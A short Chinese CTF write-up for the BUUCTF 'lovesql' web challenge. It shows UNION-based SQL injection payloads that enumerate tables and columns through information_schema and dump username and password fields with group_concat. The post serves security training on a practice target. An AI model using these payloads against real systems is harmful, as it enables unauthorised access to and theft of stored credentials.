47,【5】BUUCTF web lovesql

进入靶场

可知是单引号闭合,属于字符串型注入

则后续方法与字符串型无异

使用order by 判断出字节数为3

使用union select寻找注入点时切记第一个select为空

库名geek

表名group_concat(table_name) from information_schema.tables where table_schema='geek'#

geekuser l0ve1ysq1

字段名group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#

id username password

group_concat(column_name) from information_schema.columns where table_name='geekuser'#

可知两个表字段名相同

查询字段内容

group_concat(id,username,password) from geek.l0ve1ysq1#

group_concat(id,username,password) from geek.geekuser#

得到flag

笔记

1,本题考查字符串类型的注入

2,group_concat(id,username,password) from geek.geekuser#

一次可以爆出表格所有内容

相关推荐
Hello.Reader3 小时前
RedisJSON 路径语法深度解析与实战
数据库·redis·缓存
TDengine (老段)3 小时前
TDengine 使用最佳实践(2)
大数据·数据库·物联网·时序数据库·iot·tdengine·涛思数据
设计师小聂!6 小时前
Linux系统中部署Redis详解
linux·运维·数据库·redis
kfepiza6 小时前
Debian-10编译安装Mysql-5.7.44 笔记250706
linux·数据库·笔记·mysql·debian·bash
Touper.6 小时前
Redis 基础详细介绍(Redis简单介绍,命令行客户端,Redis 命令,Java客户端)
java·数据库·redis
不剪发的Tony老师6 小时前
phpMyAdmin:一款经典的MySQL在线管理工具又回来了
数据库·mysql·phpmyadmin
极限实验室6 小时前
TDBC 2025 可信数据库发展大会,极限科技邀您来赴约!
数据库
lixia0417mul28 小时前
使用Starrocks替换Clickhouse的理由
数据库
张璐月9 小时前
mysql的性能优化:组提交、数据页复用、全表扫描优化、刷脏页
数据库·mysql·性能优化
沐尘而生9 小时前
【AI智能体】智能音视频-搭建可视化智能体
数据库·人工智能·ai作画·音视频·娱乐